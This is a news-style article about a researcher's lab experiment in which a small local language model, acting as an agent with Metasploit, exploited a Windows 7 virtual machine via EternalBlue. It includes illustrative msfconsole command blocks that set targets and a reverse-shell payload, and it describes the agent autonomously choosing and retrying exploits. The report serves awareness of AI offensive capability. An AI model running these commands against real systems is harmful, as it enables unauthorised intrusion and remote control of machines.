A researcher has demonstrated that small-scale language models running locally can successfully execute known cybersecurity exploits against legacy systems.
In an experiment detailed on thepatrickfisher.com, developer Patrick Fisher used a Qwen3.5 9B NVFP4 model to attempt to penetrate virtual machines running Windows XP and Windows 7. The test was conducted for research and entertainment purposes using a local setup.
Fisher configured the test using vLLM running in Windows Subsystem for Linux (WSL) on a laptop equipped with an RTX 5080 GPU and 16GB of VRAM. This hardware allowed the model to run with a full 256K context window.
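The article does not reproduce Fisher's exact launch command, but a vLLM server with a 256K context window would typically be started along these lines (the model ID and flag values below are assumptions for illustration, not taken from the write-up):

```shell
# Hypothetical vLLM launch; model ID and tuning values are assumed.
# 262144 tokens = the 256K context window mentioned in the article.
vllm serve Qwen/Qwen3.5-9B-NVFP4 \
  --max-model-len 262144 \
  --gpu-memory-utilization 0.90
```

`--max-model-len` caps the context length the server will accept; fitting a 256K window alongside the weights on 16GB of VRAM is plausible here because NVFP4 is a 4-bit quantized format.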
The setup included a custom "vibe coded" agent with full command-line access, web search, and integration with the Metasploit framework. The agent's web search functionality was toggled by an environment variable, `QWEN_ENABLE_WEB_TOOLS`, set to 1.
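In a shell session, enabling the agent's web-search tool would look like this (the variable name comes from the write-up; where and how the agent reads it is not specified):

```shell
# Enable the agent's web-search tool before launching it.
export QWEN_ENABLE_WEB_TOOLS=1
echo "$QWEN_ENABLE_WEB_TOOLS"
```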
Fisher initially targeted a Windows XP SP1 machine. Partway through testing, he moved the virtual machines from VirtualBox to VMware Workstation to improve performance.
While the attempt against the Windows XP SP1 machine failed, the model successfully breached a Windows 7 Ultimate target. Fisher attributed the XP failure to the chosen exploit no longer working as expected.
Against the Windows 7 instance, the Qwen3.5 9B model selected the EternalBlue exploit (MS17-010). The agent autonomously issued a series of commands to `msfconsole` to load the exploit module, set the remote host, and configure the payload.
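The article does not quote the agent's exact commands, but configuring EternalBlue in `msfconsole` conventionally follows this pattern (the target and listener addresses below are placeholders, not values from the experiment):

```text
# Sketch of a standard EternalBlue setup in msfconsole; addresses are hypothetical.
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.56.101
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.56.1
run
```

`exploit/windows/smb/ms17_010_eternalblue` is the standard Metasploit module name for this exploit; the agent would have issued equivalent `use`/`set`/`run` commands through its command-line access.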
After the primary EternalBlue attempt encountered issues, the agent pivoted to the `ms17_010_psexec` variant. This secondary approach successfully established a connection, allowing the model to achieve shell access on the target system.
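Pivoting to the psexec variant maps onto a different Metasploit module. A conventional invocation looks like the following (again, addresses are placeholders; the article does not reproduce the agent's literal session):

```text
# Hypothetical fallback to the psexec variant of MS17-010.
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 192.168.56.101
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.56.1
run
```

The psexec variant exploits the same SMB vulnerability but delivers its payload through a named-pipe technique, which can succeed where the direct kernel-grooming approach of `ms17_010_eternalblue` proves unreliable.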
Fisher highlighted the potential of small, locally run models for such tasks, stating, "I want to highlight what small models can do for someone and what they are already capable of."
He also observed the potential for continuous, automated exploitation, describing the possibility of a model looping endlessly "like some braindead zombie banging on the doors."